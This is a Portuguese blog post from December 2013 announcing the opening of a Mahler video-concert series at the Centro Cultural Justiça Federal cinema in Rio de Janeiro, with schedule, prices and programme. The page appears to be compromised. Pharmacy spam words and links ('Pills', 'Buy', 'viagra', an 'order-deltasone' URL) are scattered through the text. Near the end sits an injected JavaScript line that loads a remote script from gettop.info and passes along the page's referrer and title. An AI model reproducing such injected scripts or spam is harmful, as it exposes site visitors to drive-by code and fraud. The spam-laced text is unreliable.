Escrito por em 1 dez 2013 nas áreas CD/DVD, Lateral, Música sinfônica, Programação, Rio de Janeiro

A cada encontro um desafio.


       SERVIÇO

Order

 

 

Cine Cultural Justiça Federal
Av. Rio Branco,241
Fone: 21 3261 2550 e 3261-2565 (bilheteria)

www.ccjf.trf2.gov.br

Buy

Dia 14 de dezembro de 2013, das 14 às 16h. e das 16 às 19h. (programas diferentes)

Ingressos para cada sessão: R$ 10,00 inteira e R$ 5,00 meia para idosos, estudantes e classe musical.

Pills Livre para todas as idades.

Sala com ar condicionado.

                        

                              

 A abertura do PROJETO MAHLER encerra as atividades de 2013 da série de vídeo concertos Desafios Musicais, produzida por Saulo Chermont no Cinema do CCJF. 
 

Obras do grande compositor GUSTAV MAHLER marcaram presenças em concertos ao vivo no Rio de Janeiro durante a temporada 2013 através de sua sinfonia no.1, a Titã, apresentada pela OSESP e a maestrina norte-americana Marin Alsop na Cidade das Artes. A mesma 1ª Sinfonia e a de no. 8, chamada “Sinfonia dos Mil”, foram interpretadas em vídeos pelo jovem e carismático regente venezuelano Gustavo Dudamel em nossos concertos no CCJF. Na Europa, projetos de interpretação de todas as suas sinfonias vêm sendo realizadas por grandes maestros mahlerianos como Daniel Barenboim e Pierre Boulez.
 
O PROJETO MAHLER no CCJF terá início no dia 14 de dezembro, sábado, em duas sessões, às 14 e às 16h. (que será estendida especialmente até às 19h.), com duas programações diferentes:
 
Na 1ª sessão, às 14h., apresentaremos o documentário Conducting Mahler Pills ,  com entrevistas, ensaios e apresentações dos maestros Claudio Abbado, Bernard Haitink, Riccardo Chailly, Riccardo Muti e Sir Simon Rattle à frente das três maiores orquestras do mundo, as Filarmônicas de Berlim e Viena e a Concertgebouw de Amsterdam. O documentário de 70 minutos inclui ainda a participação especial do barítono Thomas Hampson, com legendas em espanhol. A seguir, sem intervalo, os adágios das 9ª e 10ª sinfonias em interpretação magistral de Leonard Bernstein e a Filarmônica de Viena. Duração de 50 minutos com término às 16 horas.
 
Na 2ª sessão, excepcionalmente às 16h20, teremos apresentação e palestra do professor e musicólogo Luiz Paulo Sampaio, sobre o “mundo Mahler” e a Sinfonia nº 2, denominada “Ressurreição”, executada pelos Orquestra e Coro Jovem Simon Bolívar da Venezuela, regidos por Sir Simon Rattle. A gravação,  realizada no Teatro Teresa Careño de Caracas, conta com grande orquestra e coro, somando  mais de mil intérpretes. Esta sessão terá um tempo de projeção especial, estendendo-se até às 19 horas, quando assistiremos a alguns dos melhores movimentos das nove sinfonias de Gustav Mahler regidas por Leonard Bernstein.

No final de cada uma das sessões, faremos o sorteio não cumulativo, de uma camiseta T-Shirt unisex, do projeto Desafios Musicais no CCJF, como brinde de Natal.

 

O PROJETO MAHLER continuará em março de 2014, com o CICLO DAS SUAS CANÇÕES, incluindo a Canção da Terra.

 

– No http://ftf-jp.com/topics/order-deltasone/ vídeo abaixo, o Adágio da Sinfonia no. 10 – Orquestra de Cleveland – Regência de Pierre Boulez

 

 

– No vídeo abaixo, a parte 05 da Sinfonia no. 2 (Ressurrection), com regência de yahoo viagra sicuro Gustavo Dudamel.

http://www.youtube.com/watch?v=eYCHOB25F7o

 

Purchase

Purchase

 Apoio InstitucionalPatrocínioRealização
incentivo %C3%A0 cultura Ministério da Cultura, Klabin S/A e Centro Cultural Justiça Federal apresentam: Desafios MusicaisCCJF cor 100 Ministério da Cultura, Klabin S/A e Centro Cultural Justiça Federal apresentam: Desafios Musicaisklabin 150 Ministério da Cultura, Klabin S/A e Centro Cultural Justiça Federal apresentam: Desafios MusicaisBrasil... Ministério da Cultura, Klabin S/A e Centro Cultural Justiça Federal apresentam: Desafios Musicais

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

Faça seu comentário